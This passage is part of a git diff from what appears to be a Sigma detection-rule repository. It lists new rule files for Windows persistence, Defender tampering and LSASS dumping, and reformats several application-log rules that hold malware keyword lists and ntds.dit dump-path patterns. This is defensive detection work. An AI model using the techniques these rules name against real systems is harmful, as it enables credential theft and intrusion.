tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_enabling_turnoffcheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_evtx_file_key_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_fax_change_service_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_fax_dll_persistance.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_file_association_exefile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hangs_debugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hhctrl_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hidden_extention.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_function_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ime_non_default_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_ime_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_install_root_or_ca_certificat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_legalnotice_susp_message.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_lsass_usermode_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_mal_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_mal_blue_mockingbird.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_new_application_appcompat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_odbc_driver_registered.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_odbc_driver_registered_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_access_vbom_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_disable_protected_view_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_enable_dde.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_outlook_security_settings.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_trust_record_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_trusted_location_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_office_vba_warnings_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_app_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_appx_debugger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_autodial_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_chm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_globalflags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_ie.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_ifilter.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_outlook_homepage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_search_order.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_persistence_xll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_as_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_servicedll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_services_etw_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_set_nopolicies_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_sip_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_sophos_av_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_special_accounts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_suppress_defender_notifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_keyboard_layout_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_printer_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_run_key_img_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_service_installed.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_susp_user_shell_folders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_suspicious_env_variables.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_system_lsa_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_taskcache_entry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_telemetry_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_terminal_server_suspicious.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_terminal_server_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_timeproviders_dllname.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_treatas_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_eventvwr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_vbs_payload_stored.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_wab_dllpath_reg_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winget_admin_settings_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winget_enable_local_manifest.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_winlogon_notify_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification_error.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_config_modification_status.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_block_executable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_block_shredding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/sysmon/sysmon_file_executable_detected.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/create_remote_thread/create_remote_thread_win_powershell_generic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_delete/file_delete_win_zone_identifier_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_dump_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_susp_binary_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_vscode_tunnel_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/file/file_event/file_event_win_webdav_tmpfile_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_dll_amsi_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_dll_system_drawing_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_office_excel_xll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/image_load/image_load_wmi_module_load_by_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/network_connection/net_connection_win_dfsvc_suspicious_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/pipe_created/pipe_created_sysinternals_psexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_powershell_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_susp_source_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_access/proc_access_win_lsass_uncommon_access_flag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_net_quic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_event/registry_event_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/dns_query_win_possible_dns_rebinding.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_clip+_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_stdin+_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_var+_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_compress_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_stdin_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_clip_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_mshta_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_use_rundll32_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_invoke_obfuscation_via_var++_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/driver_load_tap_driver_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/file_event_executable_and_script_creation_by_office_using_file_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/image_load_mimikatz_inmemory_detection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/sysmon_non_priv_program_files_move.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_possible_privilege_escalation_using_rotten_potato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/unsupported/win_suspicious_werfault_connection_outbound.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_event_subscription.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_susp_encoded_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/wmi_event/sysmon_wmi_susp_scripting.yml diff --git a/sigma/builtin/application/Other/win_av_relevant_match.yml b/sigma/builtin/application/Other/win_av_relevant_match.yml index d86194883..0e6c0bce3 100644 --- a/sigma/builtin/application/Other/win_av_relevant_match.yml +++ b/sigma/builtin/application/Other/win_av_relevant_match.yml @@ -1,8 +1,7 @@ title: Relevant Anti-Virus Signature Keywords In Application Log id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8 status: test -description: Detects potentially highly relevant antivirus events in the application - log based on known virus signature names and malware keywords. +description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords. references: - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31 - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed @@ -84,13 +83,20 @@ detection: - TeslaCrypt - Valyria - Webshell + # - 'FRP.' + # - 'PWS.' + # - 'PWSX' + # - 'Razy' + # - 'Ryuk' + # - 'Locker' + # - 'Potato' filter_optional_generic: - Keygen - Crack - anti_ransomware_service.exe - cyber-protect-service.exe filter_optional_information: - Level: 4 + Level: 4 # Information level filter_optional_restartmanager: Provider_Name: Microsoft-Windows-RestartManager condition: application and (keywords and not 1 of filter_optional_*) diff --git a/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml b/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml index a5225f75d..44fba0f5a 100644 --- a/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml +++ b/sigma/builtin/application/application_error/win_application_msmpeng_crash_error.yml @@ -1,11 +1,10 @@ title: Microsoft Malware Protection Engine Crash id: 545a5da6-f103-4919-a519-e9aec1026ee4 related: - - id: 6c82cf5c-090d-4d57-9188-533577631108 - type: similar + - id: 6c82cf5c-090d-4d57-9188-533577631108 + type: similar status: experimental -description: This rule detects a suspicious crash of the Microsoft Malware Protection - Engine +description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine references: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 - https://technet.microsoft.com/en-us/library/security/4022344 @@ -19,6 +18,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml b/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml index 241a1e348..1a1ab0f85 100644 --- a/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml +++ b/sigma/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml @@ -1,9 +1,7 @@ title: Potential Credential Dumping Via WER - Application id: a18e0862-127b-43ca-be12-1a542c75c7c5 status: test -description: Detects Windows error reporting event where the process that crashed - is lsass. This could be the cause of an intentional crash by techniques such as - Lsass-Shtinkering to dump credential +description: Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf @@ -23,7 +21,7 @@ detection: Provider_Name: Application Error EventID: 1000 AppName: lsass.exe - ExceptionCode: c0000001 + ExceptionCode: c0000001 # STATUS_UNSUCCESSFUL condition: application and selection falsepositives: - Rare legitimate crashing of the lsass process diff --git a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml index 2d504992e..54898dca6 100644 --- a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml +++ b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse.yml @@ -13,6 +13,7 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application diff --git a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml index cb1738aba..2a9b1485f 100644 --- a/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml +++ b/sigma/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml @@ -1,8 +1,7 @@ title: Dump Ntds.dit To Suspicious Location id: 94dc4390-6b7c-4784-8ffc-335334404650 status: test -description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious - location +description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location references: - https://twitter.com/mgreen27/status/1558223256704122882 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) @@ -14,15 +13,17 @@ tags: logsource: product: windows service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly detection: application: Channel: Application selection_root: Provider_Name: ESENT - EventID: 325 + EventID: 325 # New Database Created Data|contains: ntds.dit selection_paths: Data|contains: + # Add more locations that you don't use in your env or that are just suspicious - :\ntds.dit - \Appdata\ - \Desktop\ diff --git a/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml b/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml index 0b6e91170..5aea8a523 100644 --- a/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml +++ b/sigma/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml @@ -1,20 +1,15 @@ title: Audit CVE Event id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2 status: test -description: 'Detects events generated by user-mode applications when they call the - CveEventWrite API when a known vulnerability is trying to be exploited. - - MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI - vulnerability. - +description: | + Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. + MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log. - - ' references: - https://twitter.com/VM_vivisector/status/1217190929330655232 - https://twitter.com/DidierStevens/status/1217533958096924676 - https://twitter.com/FlemmingRiis/status/1217147415482060800 - - https://www.youtube.com/watch?v=ebmW42YYveI + - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed. - https://nullsec.us/windows-event-log-audit-cve/ author: Florian Roth (Nextron Systems), Zach Mathis date: 2020/01/15 diff --git a/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml b/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml index 849d6c2cb..e92e1b0e6 100644 --- a/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml +++ b/sigma/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml @@ -1,8 +1,7 @@ title: Restricted Software Access By SRP id: b4c8da4a-1c12-46b0-8a2b-0a8521d03442 status: test -description: Detects restricted access to applications by the Software Restriction - Policies (SRP) policy +description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy references: - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv @@ -20,11 +19,11 @@ detection: selection: Provider_Name: Microsoft-Windows-SoftwareRestrictionPolicies EventID: - - 865 - - 866 - - 867 - - 868 - - 882 + - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level + - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3. + - 867 # Access to %1 has been restricted by your Administrator by software publisher policy. + - 868 # Access to %1 has been restricted by your Administrator by policy rule %2. + - 882 # Access to %1 has been restricted by your Administrator by policy rule %2. condition: application and selection falsepositives: - Unknown diff --git a/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml b/sigma/builtin/application/msiinstaller/win_builtin_remove_application.yml index 43d5557ff..4bd0a5a1a 100644 --- 